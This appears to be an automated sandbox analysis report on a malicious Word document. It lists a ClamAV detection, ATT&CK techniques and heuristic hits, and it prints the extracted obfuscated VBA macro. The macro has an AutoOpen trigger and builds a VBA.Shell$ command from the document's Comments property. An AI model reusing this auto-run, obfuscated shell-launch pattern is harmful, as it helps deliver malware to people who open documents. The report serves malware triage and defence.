MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. It uses a "protected document" lure to prompt the user to enable editing and content, which is a common tactic for macro-based malware. The VBA script contains obfuscated strings and a call to PowerShell, indicating it likely downloads and executes a secondary payload. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further supports its malicious nature.
Heuristics 9
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
DwyMhLXs = "TYXuvMK" + "vSrrEnkDDDF" + "tzXUBNN" + "zPFYMgYFEvc" + "mhHYCrPpbW" + wvwvsUL = "UrKwHNf" + "axaBMaHheFX" + "tGmcvtE" + "bZAWTNykumP" + "FgcDCfC" + ngUBzzcMFb = "ANhRyhbuE" + "DCPSYAf" + "DsRDbfzLBf" + "FfZTLTPVW" + "YUcXMkea" + zaUAzxNF = "bPdsGZe" + "EvFVGcMTTaG" + "KSdwZYk" + "xnEZhBddhcZ" + "ydcCSBYFxBT" + "APSLcwVu" VBA.Shell$ "" + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + fRDSDGyTPw, 0 ubccMXubgLW = "bgaWMgLTyh" + "AFKLkRBu" + "spTfMTXBF" + "mSzVLUNT" + "aPhBBKZEP" + hGZhMaUBaEs = "YnkMEdXk" + "GsnwdsSyRm" + "TgbdBekKgDu" + "RNrtNKD" + "DaFeFnAXWk" + udbAArvtK = "mGLPTxXdx" + "PPEKtDNg" + "FhNmWcAYw" + "AmemEXCSch" + "tfLSvBxRE" + yUFkUNPAh = "yeEZCMpU" + "pSzwcdaM" + "sWXvdtwFEGp" + "xBNvgydwHF" + "rUsdgDub" + "reRKEdU" -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "Module1" Sub autoopen() MAyZztedWNZ -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5044 bytes |
SHA-256: 14ee968f0c338c772ec1c142cb3b04564e8aedb2b5f176434471a3284da349ce |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
284 of 348 identifiers look randomly generated (e.g. 'bZAWTNykumP') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
MAyZztedWNZ
End Sub
Function MAyZztedWNZ()
UaFLEzpwhD = "kvbyywXkce" + "haTsreBR" + "NrUUNSErRE" + "XDadvGBaLG" + "usgeZAmuD" + XdeCwVDFnRw = "chHnuZEr" + "umPpwMnG" + "yHAyAaag" + "yNvhThEkkS" + "wUKzLaaYBm" + "tRtGtLLcREe"
xsudpBYvaAF = "zZuBLhDh" + "gEswSfTRVX" + "RERdxXCmG" + "cZNfAGn" + "BGbTULYKe" + EXPcpRBShY = "FMkxmeFEv" + "sXWGfyPRhYp" + "fczegPskGK" + "eTfNasW" + "FguhnLRPRCb" + "MbdeZYbs"
MgEPKkT = "zNdYtBFeV" + "vbwTzmkvXbe" + "GFcRSFu" + "XGmescfz" + "rPvAAfb" + ELVntttzuL = "UXSyNGk" + "mNsYFWD" + "HGZSdsvKVyv" + "uNGZUCTfk" + "FAKMXbxyN" + "SHegYaCtX"
cmPcGvGXgrK = "pyhVrEWV" + "VkZVkgd" + "bMVAEzm" + "HaNRHxaWmG" + "XWRShyWU" + MTdfAunXZ = "BxdGbRyZ" + "fUSVAcS" + "vCAmZuAhfB" + "mSRvFNy" + "eCfXwWyVA" + LPVCApAReEs = "FFaUbFsBM" + "CyeUMTdm" + "DncHEKVtc" + "SzAWLCNvmT" + "rnDScfuZd" + HpHxrgTCLkw = "dtYyKYhTbDe" + "bMhRtsVY" + "XxsNnKfL" + "mtAnmwNWKBK" + "mntmENDdzNX" + "ednsctzafzr"
hyAzLDwH = "rhNRxanxpNG" + "DpAksCC" + "EgWuFFwLEX" + "eryMXstHcV" + "puXpdbcVu" + PMvFxgZad = "VSKLHZr" + "AZTubFcUd" + "FkPZENeFKYF" + "nVaFDVKgPX" + "RcYuLNVFv" + cZKKdyvd = "xhMTeape" + "cbSSDnxfvnK" + "gGRnuTfu" + "vVveHecXDyb" + "efZxwvvPzX" + ugughtB = "UwNAdKxYkfA" + "GDEULnAH" + "caxcVYAerFz" + "YNWkEPUAhZ" + "AAFnacx" + "zpSpUxv"
RzZwdmnKc = "exAgxGSHWTT" + "PuSLWgkC" + "YHgdeBhUhfD" + "FVnzwfcDX" + "zmNKfbWYVXx" + kMCvuxvWrc = "pBdByTEwW" + "pebdAMg" + "swUwWRKPHNx" + "bgppvbuE" + "gREEsuxa" + EmwpcDH = "sLZSkuAK" + "yUTPdpZF" + "EWbrNcdDnV" + "eaXgeFYUUg" + "kHfWaBfL" + "eSBrGVxPxW"
DVxKTXe = "CWMemRHCUX" + "bXxmfkZ" + "wbndRZuU" + "GHFDsWhuCK" + "HMZZcsF" + AnSHmgm = "GmygRbtrrDB" + "xBUvtYvmU" + "vYvgTNYy" + "bwRarAct" + "VfzyrPPGcE" + "HnDtvFSE"
DwyMhLXs = "TYXuvMK" + "vSrrEnkDDDF" + "tzXUBNN" + "zPFYMgYFEvc" + "mhHYCrPpbW" + wvwvsUL = "UrKwHNf" + "axaBMaHheFX" + "tGmcvtE" + "bZAWTNykumP" + "FgcDCfC" + ngUBzzcMFb = "ANhRyhbuE" + "DCPSYAf" + "DsRDbfzLBf" + "FfZTLTPVW" + "YUcXMkea" + zaUAzxNF = "bPdsGZe" + "EvFVGcMTTaG" + "KSdwZYk" + "xnEZhBddhcZ" + "ydcCSBYFxBT" + "APSLcwVu"
VBA.Shell$ "" + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + ActiveDocument.BuiltInDocumentProperties("Co" + "mments") + HgrrDtcWNfx + gUgyDafKR + LNtbaBDw + UZfPbzsbDuH + RYFaWrSEcf + DnKhHvRY + fRDSDGyTPw, 0
ubccMXubgLW = "bgaWMgLTyh" + "AFKLkRBu" + "spTfMTXBF" + "mSzVLUNT" + "aPhBBKZEP" + hGZhMaUBaEs = "YnkMEdXk" + "GsnwdsSyRm" + "TgbdBekKgDu" + "RNrtNKD" + "DaFeFnAXWk" + udbAArvtK = "mGLPTxXdx" + "PPEKtDNg" + "FhNmWcAYw" + "AmemEXCSch" + "tfLSvBxRE" + yUFkUNPAh = "yeEZCMpU" + "pSzwcdaM" + "sWXvdtwFEGp" + "xBNvgydwHF" + "rUsdgDub" + "reRKEdU"
PLCMhwUSALS = "UuNPgeVfgne" + "RhdRARX" + "wDtXPyUT" + "zRhLyUkwWG" + "matWuwkxtC" + uLcsXVaBe = "DtLWAgU" + "FepdUTUM" + "eztdnEfxaeF" + "HcxcEYz" + "BKcALcfWHNG" + EsvKLxGMVe = "UTkKkvbNL" + "mzVHfEe" + "hwMAZprLSF" + "zycceLx" + "YytFsKAYBdF" + fNZWRyBTRbx = "csbHfVUzUz" + "puZvkfkpa" + "HMWAAgsgRev" + "SGDYHhFgC" + "cemdXwrx" + "ZBYWVRwv"
UAVTzupWmBB = "xWPYxaAAa" + "Emdzxppdg" + "ZHbDkHuGAF" + "xnYKLyKL" + "FMxVZNTTGsv" + ebcCVUtfH = "MUgEEcWZe" + "tPmYdkVLmuF" + "EFRxndE" + "pUrFMXPFhV" + "AYVCPvtnGhD" + wBWbNeHEy = "KSkFxkN" + "LhWsYyYA" + "daTbuHuYsD" + "APhCVmgbRT" + "ceUxyWBPVXp" + PYafEnsNfM = "nfcwsHBgEZV" + "ebUcHdV" + "KLXsKvsbCt" + "sFMKxnkM" + "LKKLfpg" + "fGscyBd"
PwAGYrxu = "fNZxYDCg" + "buRpGuD" + "pWaGBfetgw" + "ZUMWVaCt" + "NfNXsHg" + sGcFaHfkWx = "yWWBrRVCNPz" + "NMmWPyZERX" + "YBSKZZcp" + "ShVZyTmKWuG" + "WSVSWMC" + sKYNrZRC = "tUBgTcy" + "CpvHwfbezu" + "mNEkzapyLb" + "FyeSuYfzkN" + "RpyZFEs" + "zMtaaGBfRyc"
ZnzacHMdeY = "xxTxYrb" + "RVesukUbgeD" + "TzUKeyMF" + "rWwfHwVtwHD" + "SKvemfxARbc" + RdFbDMVYPAG = "BtbRStVHVU" + "ApyWRka" + "KYTmpLRNBsL" + "UCWVphTzgZ" + "bbEmCtNzB" + bZeLNUf = "bWNyNXkkFGc" + "HLrZKrVX" + "gMfNkpSfGM" + "pmKHXazvA" + "RgvznLG" + "HcMzBDkhLb"
VDsTSWnDcAb = "yvYzdxAHB" + "cwwtkLgzmBP" + "xbxwGpbnDgy" + "WzFLSgbdA" + "fMsnEHyhwFr" + kRWmucS = "yaycrbaxU" + "wVNDWxGuyE" + "weUdKuttnP" + "YZWSpyvh" + "VvndaHLxnFg" + UuLCMVe = "XkTAVyPXfB" + "xCAFTseSWt" + "uSNmcfRmw" + "gddNnDN" + "tzdEVvn" + fUMGPbkAWXC = "PBLbDfkvGw" + "FrzMVgDU" + "nRuVkyP" + "eMvXnRSDukL" + "uTgsGzgTHkz" + "hWswCUn"
YSxUHCgyxk = "CakbWprB" + "nHSkCREEXg" + "YTsRKUWg" + "heuazHSuB" + "ytsgVTm" + XBAMUsb = "tabXwuavFG" + "GDKdfwchGPD" + "tDVtzfdUX" + "VbGsbEdmCkA" + "ZufcSxgbK" + NdNZXWBF = "mzuNNfXyYpm" + "PvMBTgF" + "vawHZspLC" + "yFLaypvPNUp" + "ydhDefF" + GYVphcLcUpY = "zvyppScTH" + "eBkcKUxdXFu" + "hErVNfrPt" + "CKyRkSk" + "DhmuLuZDra" + "xuzwfre"
GLCkcdu = "brUrrTHB" + "vLWmdsx" + "fNHKspEkUx" + "AUdCmCSG" + "NMURnvkTSf" + CRrGeFcW = "yEcLteCNZe" + "FTVxcZbPF" + "kSeUZXkNDw" + "YvGAkAVMNy" + "SMpSCNpuB" + "kDYgwMYE"
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.